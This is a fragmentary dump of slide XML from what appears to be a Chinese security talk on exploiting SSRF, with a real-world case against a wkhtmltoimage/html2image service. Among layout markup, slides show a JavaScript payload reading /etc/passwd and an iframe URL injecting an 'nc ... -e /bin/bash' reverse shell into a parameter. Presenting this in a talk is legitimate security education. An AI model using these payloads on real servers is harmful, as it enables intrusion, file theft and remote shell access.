            <a:pathLst>
              <a:path w="3582034" h="554989">
                <a:moveTo>
                  <a:pt x="3483609" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5587" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="403098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="406146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147192" y="554736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3581780" y="554736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3581780" y="549402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149478" y="549402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6095" y="403479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5333" y="401700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5333" y="8509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8635" y="5334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3488943" y="5334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="348360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7" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8519168" y="2487893"/>
            <a:ext cx="119224" cy="600509"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="103504" h="521335">
                <a:moveTo>
                  <a:pt x="7619" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97789" y="97662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97789" y="521208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103124" y="521208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103124" y="95503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761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8" name="object 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8534380" y="2595852"/>
            <a:ext cx="131659" cy="509079"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="114300" h="441960">
                <a:moveTo>
                  <a:pt x="114300" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="108966" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108966" y="403860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76326" y="436625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="436625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="441960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78612" y="441960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="406146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143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58" name="矩形 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5205376" y="2557314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algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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又一个截图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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SSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="标题 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756789" y="27496"/>
            <a:ext cx="6096073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3" name="矩形 62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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43392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315237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8568BCD-7873-4DEC-9B80-FDA7DCBE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72" y="840783"/>
            <a:ext cx="12412963" cy="48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90" y="38291"/>
            <a:ext cx="5473268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228814C-6C33-4E79-A393-F901BDE8B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9" y="1543574"/>
            <a:ext cx="5734571" cy="13928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76456F-1C5B-4708-87AA-DE9571B47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10" y="446052"/>
            <a:ext cx="3279775" cy="55877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C8EE58-1359-4F0B-9388-46149F54B2EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1894475" y="4420998"/>
            <a:ext cx="2452167" cy="704676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1747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wkhtmltoimage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8B9C51E-5361-4DDE-8002-8A1A9BD24BB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2801741" y="3066336"/>
            <a:ext cx="637636" cy="108218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B4949C29-E5A0-483D-8E6D-F3191461DF33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5911240" y="3933129"/>
            <a:ext cx="637636" cy="1680414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A0E30-E86A-41D8-8740-BCF067E0CA84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1813330" y="5834643"/>
            <a:ext cx="4416728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https://wkhtmltopdf.org/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204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扫端口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测试解析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思考：我们能做什么？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89" y="27496"/>
            <a:ext cx="5824179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D24D0F2-93D8-494A-96DD-D750C3ADE08C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3020603" y="1825444"/>
            <a:ext cx="116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：太慢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A4B4C7-5B76-45D3-9FC5-88180F8DF778}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3487135" y="2284220"/>
            <a:ext cx="116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：可行</a:t>
            </a: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41C76B-5FD8-44C3-BF2E-9777FCFB2D32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5517905" y="3215462"/>
            <a:ext cx="252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读文件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08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756790" y="27496"/>
            <a:ext cx="3954306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关于我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4F4FFB3-54D3-4801-8E5C-C0389E9C8335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3977278" y="2666647"/>
            <a:ext cx="245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网易蓝军专家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2088E4-1807-45C9-A73D-B1C64D2F2AFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3977277" y="2149487"/>
            <a:ext cx="245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xiwu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9C632-BC77-4A95-82A0-6453C0F098BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3977277" y="3183807"/>
            <a:ext cx="296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漏洞扫描运维与开发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D18780-E48C-4240-A0F4-E252336F664C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3977277" y="3736474"/>
            <a:ext cx="287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业余白帽子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D0C8B7-D4AA-43AF-9180-F651F60F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70" y="2017669"/>
            <a:ext cx="2332275" cy="23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212495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D9ECCCC-AFA2-46B8-840D-3248FA8025B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2901808" y="1526985"/>
            <a:ext cx="10247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    x=new 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XMLHttpRequest,x.onload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=function(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C7444A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zh-CN" b="0" dirty="0" err="1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872A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C7444A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 err="1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872A2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x.open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GET","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:///etc/passwd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"),x.send()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C9980-EAB8-4143-873A-B3F75A6B7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2" y="3334654"/>
            <a:ext cx="8859557" cy="21173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015DEE-B95C-4C79-8FAC-F60E94F5021C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511728" y="1761688"/>
            <a:ext cx="176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读取文件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CC01B7-A44D-49D5-BB31-3C7D9CE54B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441549" y="1761688"/>
            <a:ext cx="1761689" cy="52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2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171399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FF50650-19FC-40EA-A1A3-0C8E37FF2114}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808063" y="1491556"/>
            <a:ext cx="3569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读取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en-US" altLang="zh-CN" sz="30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bash_history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36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E50E13DC-8297-4AFC-822C-9FDB8126A1B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250264" y="1578063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1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2075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504039-3F65-470A-A2B9-BF2D78BAFE86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808063" y="2608690"/>
            <a:ext cx="3569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读取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access log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="圆角矩形 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9303EC2-78C3-4CC2-8B77-535D704550E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250264" y="2695197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2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2075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021295-357B-4C08-86B9-7EA9815F653D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808063" y="3716644"/>
            <a:ext cx="3569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进行命令注入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3988E140-FDE7-491D-90C6-0F2376A47D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250264" y="3803151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3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2075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CF0034-CAC0-44FA-B1DE-E442B3FEBAD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6207853" y="3633346"/>
            <a:ext cx="1107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&lt;iframe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http://127.0.0.1:8181/convert/html2?customStr=--quality+100%3bnc+x.x.x.x+7723+-e+/bin/bash%3b%23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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9F4524-A54D-42DB-A299-C59BE0E9D6A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6207853" y="1269328"/>
            <a:ext cx="675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html2image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html2image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tomcat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9872A2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tomcat</a:t>
            </a:r>
          </a:p>
          <a:p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cd logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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less localhost_access_log.2018-04-23.txt</a:t>
            </a:r>
          </a:p>
          <a:p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curl http://127.0.0.1:8181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8B182-FC70-475D-BCD5-7AAC7F2105E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6207853" y="2567027"/>
            <a:ext cx="6686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POST /convert/html2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="676867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customStr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=--quality+100++--corp-w+750+--corp-h+1080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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HTTP 1.0</a:t>
            </a:r>
          </a:p>
          <a:p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66446-7AEE-4183-9FA2-ACB98193A429}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6207853" y="1269328"/>
            <a:ext cx="6107186" cy="115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87305B-CFF4-48C4-9278-F5FD8F23F376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6207853" y="2543670"/>
            <a:ext cx="6107186" cy="767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26DA89-546C-4922-81A2-991782219898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6207853" y="3572982"/>
            <a:ext cx="7734650" cy="767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7" grpId="0"/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="12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>
            <a:off x="756789" y="38291"/>
            <a:ext cx="5315237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3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26" name="矩形 2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D17C4C9-5DAE-44EC-9443-DC11DBE2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90" y="1195016"/>
            <a:ext cx="4286643" cy="3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6365" y="2258958"/>
            <a:ext cx="3070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868045" y="5715"/>
            <a:ext cx="5540375" cy="871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altLang="zh-CN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46591" y="2190072"/>
            <a:ext cx="260931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安全趋势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4896" y="2190156"/>
            <a:ext cx="446507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SSRF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65099" y="2706991"/>
            <a:ext cx="2892314" cy="77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利用现状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利用困境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288791" y="2276579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1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2075" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="圆角矩形 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9374881" y="2270459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3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2075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455" y="5634"/>
            <a:ext cx="585149" cy="745448"/>
            <a:chOff x="-43542" y="452431"/>
            <a:chExt cx="507999" cy="647163"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形 39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41" name="矩形 40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16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953636" y="2168566"/>
            <a:ext cx="446507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实战分享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97019" y="2706991"/>
            <a:ext cx="2892314" cy="108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 1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 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</a:t>
            </a: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444231" y="2276195"/>
            <a:ext cx="402795" cy="355676"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2005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75" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2075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66F107-CAA2-4C28-BE32-DAA2FCE6E265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846591" y="2743114"/>
            <a:ext cx="2892314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45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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1845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红蓝对抗逐渐流行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SDL/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DevSecOps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落地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扫描器精细化运行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通用漏洞补丁覆盖及时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安全相关制度流程规范化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与白帽子合作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企业安全能力提升，风险暴露面缩小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89" y="27496"/>
            <a:ext cx="6550021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安全趋势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AutoShape 2" descr="SSRF漏洞| BayMRX">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D539903F-8F05-42C3-8144-800CFD37FC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9113" y="2968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F3D2C-FAB6-48BC-BCC3-BA01D3E6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12" y="1957264"/>
            <a:ext cx="4652208" cy="26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327202"/>
            <a:ext cx="10203815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端口扫描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攻击内部应用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读取本地文件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90" y="27496"/>
            <a:ext cx="3954306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SSRF</a:t>
            </a:r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BC13FC-0ECF-4518-8C38-913D86632FF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3814607" y="2814002"/>
            <a:ext cx="629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业务功能场景决定了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SSRF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的实际威力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4998B1-5E79-45DA-930C-8F2D79FB4982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919604" y="3453256"/>
            <a:ext cx="10203815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Blind SSRF</a:t>
            </a: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支持协议：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gopher/file/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dict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回显内容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……</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224691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挖洞：仅限于验证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漏洞利用：需结合内网环境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543300" lvl="7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缺少实战利用经验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90" y="27496"/>
            <a:ext cx="3954306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利用现状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pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="一脸懵逼- 简书">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5718AAE0-4ADE-48F4-8044-30F1FAEF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24" y="32364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19605" y="1721485"/>
            <a:ext cx="10203815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大型互联网公司内网环境复杂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00500" lvl="8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56790" y="27496"/>
            <a:ext cx="4201104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利用困境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4734560" y="-2273935"/>
            <a:ext cx="4599940" cy="11427460"/>
            <a:chOff x="1426463" y="2196083"/>
            <a:chExt cx="2156968" cy="3609341"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1847088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8" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3057144" y="219608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1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73151" y="731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19" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3509771" y="3209544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29">
                  <a:moveTo>
                    <a:pt x="0" y="74675"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73151" y="7467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29" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1426463" y="4437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0" name="object 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1426463" y="37825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6"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74675" y="746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1" name="object 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3509771" y="3852671"/>
              <a:ext cx="73660" cy="500380"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="73660" h="500379">
                  <a:moveTo>
                    <a:pt x="0" y="499871"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73151" y="49987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499871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2" name="object 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2727960" y="5731764"/>
              <a:ext cx="501650" cy="73660"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="501650" h="73660">
                  <a:moveTo>
                    <a:pt x="0" y="73152"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="501395" y="73152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501395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0093D4"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2075"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="object 75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1463039" y="2225039"/>
              <a:ext cx="2077720" cy="3543300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2077720" h="3543300">
                  <a:moveTo>
                    <a:pt x="1624076" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2077212" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077212" y="3543300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3543300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412877" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12192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 sz="2075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6" name="矩形 65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F5D4E1-C1BE-4919-804B-2E81500D9764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4861447" y="3888635"/>
            <a:ext cx="4072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如何利用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SSRF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进入内网？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71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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780841" y="2338002"/>
            <a:ext cx="4126039" cy="639276"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3582034" h="554989">
                <a:moveTo>
                  <a:pt x="3483609" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5587" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="403098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="406146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147192" y="554736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3581780" y="554736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3581780" y="549402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149478" y="549402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6095" y="403479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5333" y="401700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5333" y="8509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8635" y="5334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3488943" y="5334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="348360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7" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11790874" y="2344146"/>
            <a:ext cx="119224" cy="600509"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="103504" h="521335">
                <a:moveTo>
                  <a:pt x="7619" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97789" y="97662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97789" y="521208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103124" y="521208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103124" y="95503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761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8" name="object 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11806086" y="2452105"/>
            <a:ext cx="131659" cy="509079"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="114300" h="441960">
                <a:moveTo>
                  <a:pt x="114300" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="108966" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108966" y="403860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76326" y="436625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="436625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="441960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78612" y="441960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="406146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143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2075"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8750293" y="3280867"/>
            <a:ext cx="4027016" cy="31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155"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc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支持连接多种自定义数据源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" spc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485270" y="2447826"/>
            <a:ext cx="2585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algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00D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大数据展示应用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" spc="-25" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00D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1" name="标题 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756789" y="27496"/>
            <a:ext cx="5434285" cy="802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实战分享</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0096FF"/>
                </a:solidFill>
